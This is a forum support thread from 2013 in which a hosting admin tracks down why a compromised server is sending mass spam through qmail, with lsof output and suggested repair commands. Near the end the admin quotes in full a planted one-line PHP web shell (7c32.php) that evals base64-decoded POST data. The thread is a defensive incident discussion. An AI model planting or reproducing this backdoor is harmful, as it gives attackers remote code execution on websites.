Author Topic: Qmail problem (Read 9118 times)

insanity · « **on:** 2013-08-18, 17:12:28 »

I have alot of this and no idea what to do. This botnet send millions emails and i can't find how they login.

qmail-rem 13165     qmailr    3u     IPv4           41886040        0t0        TCP secureserver1:54643->64.38.116.12:smtp (ESTABLISHED)
qmail-rem 13170     qmailr    3u     IPv4           41886075        0t0        TCP secureserver1:54645->64.38.116.12:smtp (ESTABLISHED)
qmail-rem 13195     qmailr    3u     IPv4           41886638        0t0        TCP secureserver1:35373->www167.sedoparking.com:smtp (SYN_SENT)
qmail-rem 13210     qmailr    3u     IPv4           41886517        0t0        TCP secureserver1:57847->fa-in-f26.1e100.net:smtp (SYN_SENT)
qmail-rem 13251     qmailr    3u     IPv4           41886984        0t0        TCP secureserver1:57899->fa-in-f26.1e100.net:smtp (SYN_SENT)
qmail-rem 13502     qmailr    3u     IPv4           41888292        0t0        TCP secureserver1:57933->fa-in-f26.1e100.net:smtp (SYN_SENT)
qmail-rem 13730     qmailr    3u     IPv4           41889724        0t0        TCP secureserver1:57964->fa-in-f26.1e100.net:smtp (SYN_SENT)

MRatWork · « **Reply #1 on:** 2013-08-18, 17:44:32 »

Try 'yum reinstall *-toaster; sh /script/fix-mail; sh /script/restart-all'. Better update your KLoxo-MR with 'yum clean all; yum update; sh /script/cleanup; sh /script/restart-all'.

insanity · « **Reply #2 on:** 2013-08-18, 17:45:43 »

Do you have idea why this botnet is able to send emails directly from localhost ?

MRatWork · « **Reply #3 on:** 2013-08-18, 17:48:22 »

Maybe your application have 'bad code' (usually certain plugin(s) on application).

insanity · « **Reply #4 on:** 2013-08-18, 17:49:57 »

What application? And now if i reinstall qmail all mail accounts will be removed or?

MRatWork · « **Reply #5 on:** 2013-08-18, 17:52:12 »

Example, certain wordpress are 'bad'. So, I mean applications are wordpress, joomla and etcetera.

insanity · « **Reply #6 on:** 2013-08-18, 17:54:23 »

So if i reinstall qmail... The bad application will continue exist... So where is the point to reinstall ?

MRatWork · « **Reply #7 on:** 2013-08-18, 17:56:02 »

Try disable/remove plugin on your application (like wordpress). It's not qmail issue but your application issue.

insanity · « **Reply #8 on:** 2013-08-18, 17:58:42 »

It is easy to say. But with 5000+ sites will be difficult

MRatWork · « **Reply #9 on:** 2013-08-18, 18:13:56 »

It's your problem. Kloxo-MR not able to help you for this situation.

insanity · « **Reply #10 on:** 2013-08-18, 23:12:03 »

I found it.
Very strange... Latest joomla version but inside was created file with name 7c32.php
The code inside was: <?php if(isset($_POST["codx65"])){eval(base64_decode($_POST["cox64e"]));}?>

MRatWork · « **Reply #11 on:** 2013-08-18, 23:14:40 »

Is 7c32.php as regular file of joomla?.

insanity · « **Reply #12 on:** 2013-08-18, 23:15:27 »

Nope... Actually i see in directadmin forum same problem.
http://forum.directadmin.com/showthread.php?t=46613

This file can be used in almost all CMS systems

MRatWork · « **Reply #13 on:** 2013-08-18, 23:19:45 »

This 7c32.php also attach to wordpress and drupal.

Read https://drupal.org/node/2056637 for example.

insanity · « **Reply #14 on:** 2013-08-18, 23:21:04 »

Yes as i say it can be used for almost all cms systems.

The problem here is that this joomla is latest version. So i need to investigate for some corrupted modules/plugins....

Author Topic: Qmail problem (Read 9118 times)

insanity

Qmail problem

MRatWork

Re: Qmail problem

insanity

Re: Qmail problem

MRatWork

Re: Qmail problem

insanity

Re: Qmail problem

MRatWork

Re: Qmail problem

insanity

Re: Qmail problem

MRatWork

Re: Qmail problem

insanity

Re: Qmail problem

MRatWork

Re: Qmail problem

insanity

Re: Qmail problem

MRatWork

Re: Qmail problem

insanity

Re: Qmail problem

MRatWork

Re: Qmail problem

insanity

Re: Qmail problem